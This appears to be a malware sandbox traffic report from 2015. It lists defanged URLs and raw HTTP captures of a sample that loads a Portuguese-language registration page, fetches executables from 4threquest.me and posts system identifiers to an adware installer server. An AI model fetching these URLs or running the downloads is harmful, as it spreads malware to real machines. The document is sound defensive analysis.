hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://ocsp2.globalsign.com/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ==108.162.232.198
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo=
hxxp://www.4threquest.me/registro/icone_cadeado.gif
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756
hxxp://www.4threquest.me/registro/carregando.gif
hxxp://www.nowtake.me/8Hk4o
hxxp://www.4threquest.me/310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://www.4threquest.me/ids/id230313/stats_confirma.htm
hxxp://www.4threquest.me/310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://pcmega.go2cloud.org/SL2
hxxp://download.mozilla.org/?product=firefox-34.0.5-complete&os=win&lang=en-US63.245.215.111
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=72.167.239.239
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8=
hxxp://www.1strequest.me/desprotetor_setup.exe
hxxp://www.4threquest.me/registro/top-line.gif

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.mobimidia.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:07:07 GMT

Server: Apache

X-Powered-By: PHP/5.3.14

Content-Length: 0

Connection: close

Content-Type: text/html

GET /registro/top-line.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: image/gif

Content-Length: 1724

Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT

Connection: keep-alive

Expires: Sat, 30 May 2015 23:07:42 GMT

Cache-Control: max-age=2592000

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............. .........\.0!....B....A...f..qcE. -..8..D..-...0...)..d......I.T.R.K..aJ.Z3.O.-w.\*s...MgvD.....E..$..aW.Z.&M.....O.B..0$J.....K....x.....o_.~...L.0..u..Ulx....#..LY2..y![...q......MZ......^..4...c.V.:5m..]..Mz....E.....l..M..M.6...e.^N..t..QSG^.....wC.g^......k.~.x........>.............( ....`.......1.........M(..... .......^X....."...x..(V...... ...Xb.0....0.h_.-....D.i..H&...L6...PF)..TVi..Xf...\v...`v.@...y..e.y..l.9&.f....t.Y..o.yg.x.Y.....g......v....p.z..|6...w..h..R....*...j:.....)....I*.......r.....F.....*.........Zk........Kj....(..D ...L[...R.m.gn.@.......j.-..z.-....n...k...............n...{....;........'.........:.p....p...|...Z.1..{,.......,....0....3?Ps. .|3.9..s.;....:.M..H'Ms.H..4.N..5.OS]u.6g]..=.<.

<<< skipped >>>

GET /010914s/010914i.htm HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Connection: Keep-Alive

Host: VVV.4threquest.me

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: text/html

Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Content-Encoding: gzip

2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y........8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\o.U9..n.=Hj(...^...J8.;....g............`...G.....0......

GET /010914s/verificar_ip.php HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:43 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

Content-Encoding: gzip

78..............M-IT.()).M-,.,.U*JM J-.PRH.. I. .U2.....U.)...///.3).(.*O-...M.704.44)..iHL....J,. .(..L.526064VW.....6.i.....0......

GET /010914s/contabilizar.php?id=230313 HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:43 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: EXPIRED

CC: UA

Content-Encoding: gzip

8e............u....0.E...P......"._....4.....7....p6.>rl....3"1....w.rja?..,.....^..@l.^.k..X...){#rTb.......%T..:.....h.......J...fg.......Z.......0......

GET /ids/id230313/stats_confirma.htm HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/010914s/contabilizar.php?id=230313

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:45 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: MISS

CC: UA

Content-Encoding: gzip

14........................0......

GET /i.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: t1.extreme-dm.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.7.10

Date: Thu, 30 Apr 2015 23:07:06 GMT

Content-Type: image/gif

Content-Length: 1004

Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT

Connection: close

ETag: "403dfaf7-3ec"

Expires: Fri, 01 May 2015 23:07:06 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..a..{..y...{.........................................................!.....@.,....).&....@.pH,..H.o.l:..(S.KZ.G..............j.... pwX.....@.....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A. .e7v.0...........C....e..P...9p..1........1 .>F.0.@.QC.. u.H.b../...@.a.^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B .zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g...<...=D....l..........@......1.H.........0........>...>........B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.I0......ffAW....p......Q.\u..,....5...~..7..&.@.....AB.-.A........2....`.......nDK...,..._d...xq.m........k...........n.A..;..

POST /thankyou.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 1308

Host: VVV.amoninst.com

_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=193.138.244.231&cmdl=amisetup2899__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3e5a8f2a30ab988ef7a611138130e98a&current_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT6.1SP1&sysid=915A4028688142931B5DDA64A4540CAD&sysid1=066389C9740F80692FC30C6511692204&te=1430435235&tid=&ts=1430435233&ver=1.1.2.41&vert=3&mhx=dd599d1761410d78de3549ee3ea8673841bec801&base=X3NydmxvZz0mYnJvd3Nlcj1pZSZjW015QmVzdE9mZmVyc1RvZGF5QlJdW3JdPTAuMDEmY1tNeUJlc3RPZmZlcnNUb2RheUJSXVtzXT0tMSZjW3VwZGF0ZXJdW3JdPTAmY1t1cGRhdGVyXVtzXT0tMSZjYXBwPXVwZGF0ZXImY2M9VUEmY2lkPTk2NjQmY2xpcD0xOTMuMTM4LjI0NC4yMzEmY21kbD1hbWlzZXR1cDI4OTlfXzk2NjQuZXhlIC9zICAvdmVyIDEuMS4yLjQxICAvdSBodHRwOi8vd3d3LmFtb25pbnN0LmNvbS9pbmRleC5waHAgL3RhIC9jaSA5NjY0IC9pIE15QmVzdE9mZmVyc1RvZGF5QlImY250PTNlNWE4ZjJhMzBhYjk4OGVmN2E2MTExMzgxMzBlOThhJmN1cnJlbnRfc2NyZWVuPUZpbmlzaF9MYXN0X1NjcmVlbiZpcz0tMzEmbmV0ZnM9LTMxJm9zPU5UNi4xU1AxJnN5c2lkPTkxNUE0MDI4Njg4MTQyOTMxQjVEREE2NEE0NTQwQ0FEJnN5c2lkMT0wNjYzODlDOTc0MEY4MDY5MkZDMzBDNjUxMTY5MjIwNCZ0ZT0xNDMwNDM1MjM1JnRpZD0mdHM9MTQzMDQzNTIzMyZ2ZXI9MS4xLjIuNDEmdmVydD0zAA==

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:15 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:15 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....

GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:51 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120373, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:23:40 GMT

Expires: Sat, 02 May 2015 10:23:40 GMT

ETag: "befea096dacc08f0bc2d2ea14601c0a19709dbf1"

Content-Length: 1787

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222340Z0k0i0A0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,....i.O...\.....20150430222340Z....20150502102340Z0...*.H..............&.9.9.....].Y....D....T......bf\.u.......yT.=..v...N......J<..P'sX-&......D.-.."`o%L..7..Z..0...^2lm..-g{V.....M..... .....ZCd.-.-...Cg..HL.....PL.C.d.I.......o..g..6..NR.N3..x...4c5....F.....`C&\c..TX.p0.[......`EK.D......b[.gEb..1...3p.p[.....i-.. ..9z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H...............

<<< skipped >>>

GET /registro/310113f8.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: text/html

Last-Modified: Wed, 11 Mar 2015 17:29:02 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Content-Encoding: gzip

805.............Y.n.6..=?.....0[.d;..p...0']......h..,..m' .<{.=.^l..dK...i.....J...xt..qtu.....p .....'...a.7n..:..Z.j ....i..m.N.1.XJ|<.. 8]DU.q..}........>..x..o.z'L9...-..*.,....f.j.`.*.JO0..A..g|.....@R)./I$.......{.T..%..Y..._.x....]._...RS..c...s.V..^.i...O?W.U.`...........9.g,..t*:P...........n...\.>O.}.h.G......y7!"f..'.x...a.b...... ....4Z..-......1...-.......&I.....].g...!-.&n...@...rzg.s.gT..0..%.....Z..i...>.g...^n.x[.....~.q*....l.. .S.....Yp.....?..4.IH...%.O...."...........x4.......T.n.b.Mi).R....9(.U.J5..|.....t`a...I*.U.s.i.?Q"..A...s.0q..g4x.]u.|...Jl..y.....h.h.....i..U.~..UZ$4.^.h.i..A;.x\.~..l..j.d..=V....i.....@..g.c......@...h.rQ..,U..B&.5G!..QD.....c.Vc;..J.}2.E.^...^..T.L.B.k......c;....9SI.la.UC...&..%.......]V...nII..-...S.._."...dVb.,~6.HS]..9Q@....,..b$UB..........<..W...Q..@h.K...;..0#.TE....adO...o?`......].xfh/..c^e.}.}.lO..V.......w...^pG`.`!) ....k2..p...0...V..f.{>o.g.....*.l..........='..X...Z.I.$i}..!Q.C..X/.p$g;N6@v.:.....>..m,...@.5....4...]...>.q8l.^.........}2.^......[X..iL.... t.C.......y..C...6..r.7.C......F..]..PQ.....^.l.a..x......$^....Y....]F-.6.{...fLy....h.Y.7<.Ic.8..D,O.....8H'.1.gx.H.^..I.P.C4L.}.Qt>.^..v....L.A..xyJ.....[...8.g.mqzl>.6d.`..<.c7..fl..N.......&.BRx.....H.._.~{{>.].T.9...(...Q....U.....vc.....=3BB.w5Z..(..7.xx...}.Gv.......[..]....5..K..........WC...........'v[F.v.8uc.._.|A.'.............5xq..@...........cA..-..4...b.i.m.{f'...Pn(X..Cw...K.......&W...x4........l....V..7=...T~%.......0..&..3C.H.p..E...|.Y

<<< skipped >>>

GET /registro/icone_cadeado.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: image/gif

Content-Length: 2256

Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT

Connection: keep-alive

Expires: Sat, 30 May 2015 23:07:42 GMT

Cache-Control: max-age=2592000

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

GIF89a(.2....aH........z......i........r........X..7.......................8.. .....x..g.................?.....7..E.....n....f...^..$..H..............[........2...........:...........z.......m...W..l.................... ...................\........h..h4.p......*...........4.............. ..............u.....3........K....{(.....(...........#.....i..J..b..........m........o.....................N.................l.....#................c.................|..........I0............>....{.........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.s........~..o .......................=..>....m...Z.....x...........1........g........d......9*..............._....................z..t..}........L..Y..B.....J..&.....0......................z>.. .q ...........E.|.............!.......,....(.2........H..?;2n}.....|....H.....S...1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P...S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).%!...@.Gx.........(..3W....0xP.$".P.............X`*.......^.J....!. ........G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k..........-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF.......R...]d..".*;0"H.`....@r... .@d@...C.mt.......dp.....3.=k..@

<<< skipped >>>

GET /registro/carregando.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.4threquest.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: image/gif

Content-Length: 4176

Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT

Connection: keep-alive

Expires: Sat, 30 May 2015 23:07:42 GMT

Cache-Control: max-age=2592000

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

GIF89a . ........{...........................l..D..N..............L.}...........................6...........z..<..(..,.....v.....".....V........ ....................&........>.....t.................0........B.................Z..$.....~..r..............|.....h..j........`........x........X..2.................*..b..^.....p...........................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,.... . ......................)...).4.)...3....*.5..A..9@..... ..&.....<........ ........)KFN....!.......%....."..!'.........,..D......#..6...`xU....-T......A. d .......1.. ...._.r`...A......Q.'.L.pH`A....Q0BKA....1.......F..`...c.pdld......(.`b.....R.p"...a.=xa!./{..6...B...?6.%b..Ru$`..2$....6dC..E.c!F(C.A.S.%hE.......@.. ...$'rbP..I.)D.v.........(....wFj..2....3>X.p@..cF<.:..I....T.....#.JD'.7....-.MK...%&...`...@.!.......,.... . ............TT).......I((K/.....4F....F......K....I........AFL..FA.....(.XMDF..%....$..:(NI..........<....<(0.6[C..I...B!.$.EZ..3...Q.8.$..8V r`B."..o.n.)....O.`0..L..'."(H..c#.....B..?..081....[0........' .B......~` A....FB(......M;z.".D<......bC....t1J...'U.j......!....$.......u.......8.{e..#Q........%.UP.N..(N.....D.&.....$s..`G...eJ&.8D0.. A.....).....K.j..E....<H1."..B.j.:...N.<z...c..! @..b.c..!sP...H.......!.......,.... . ..................E]A......K.5F#.....O ..%@-............>@L..:...D.8'....N.[.<.-\..Q.'["&../_...%%:..M...O..%...T...:.&9A*G.,.N.&......J.......T.`.......s....B.Np.!...'..(.....

<<< skipped >>>

GET /img/Global/declineBG.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 1527

Connection: keep-alive

x-amz-id-2: LsJpuXhB3IbHEy7ZHe7WV8uGeSQ9o9HFRMUuEjtSs00r6BYLEJZsLd1C2dR1aukm

x-amz-request-id: 93C41663D1D347D1

x-amz-meta-s3fox-filesize: 1527

x-amz-meta-s3fox-modifiedtime: 1385033566667

Last-Modified: Thu, 21 Nov 2013 11:43:23 GMT

x-amz-version-id: TJNGNP9J.pYgtH1WelxAjMHRSvYRyHyQ

ETag: "c3671f6a6b3932da75a4c6b57cd45614"

Accept-Ranges: bytes

.PNG........IHDR..............f@J....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:7496059F5C24E31185CEB55A04ED8505" xmpMM:DocumentID="xmp.did:99574DB952A011E39674B18426DE0A96" xmpMM:InstanceID="xmp.iid:99574DB852A011E39674B18426DE0A96" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7EDADDF8E724E311B036C0E7691E1950" stRef:documentID="xmp.did:7496059F5C24E31185CEB55A04ED8505"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C...'IDATx...IN.@..P<..9i...RJi.v......!.l..W.n....=.#.....~.;......%H.q8.0.. . .....u...4..... Hp*/.@#. . .v$.H H H...4.....`G...R..uuy..m[.u}..g.%...i.!.a.S..}{...ww^k..#B.C^...b.*..26a}._..-....8......F:?K.E...f...R.......t..RDh...S.x....)f.|8.O..'O.8......F.q./:...#..:N9.........\w.K\o#...k.o3...RykW.......LQyh...{...#U{...^w..wS......A...h$@.@.......$0..F.A..v..@..h.h$.$0..F....v..@....h$.$.h...4.h$@..h.....0..F.A.....@..h....$0..F.A..v..@..hg..........@#. ....H H`..........@#...F;.H H. ...4... H`G.........@#......

<<< skipped >>>

GET /img/Global/No_Button.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 1090

Connection: keep-alive

x-amz-id-2: 7WjnhU0tPyReiclfSk2lMFXKk a5jcICVQZv5/SuoOjs3rkF2ueCvAPmIZCZwiYU

x-amz-request-id: 7FCF11E31494066F

x-amz-meta-s3fox-filesize: 1090

x-amz-meta-s3fox-modifiedtime: 1380713503002

Last-Modified: Wed, 13 Nov 2013 16:12:45 GMT

x-amz-version-id: H1gWa5fQ5azVvHrSdifdTj_fe_Q1czxc

ETag: "4462e7ebdf4a24f57b288fbca0602dea"

Accept-Ranges: bytes

.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0124EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0224EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B97008A24EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:2B97008B24EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...\....IDATx...1..1.E'A...J/ .*.....ZYne..3....jR...!.#I1?.H..5..v..T.KSl...Rz...r.W.......m\|...C.'.`.#.f.......A(B..P@(B...E(B...E(B.....f&Y:.j..-G......3.&...i...s.G.l.a;...%].j.V.j.....h"..5.......IEND.B`.....

<<< skipped >>>

GET /img/Sihehihi/Sihehihi_31_03_15.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

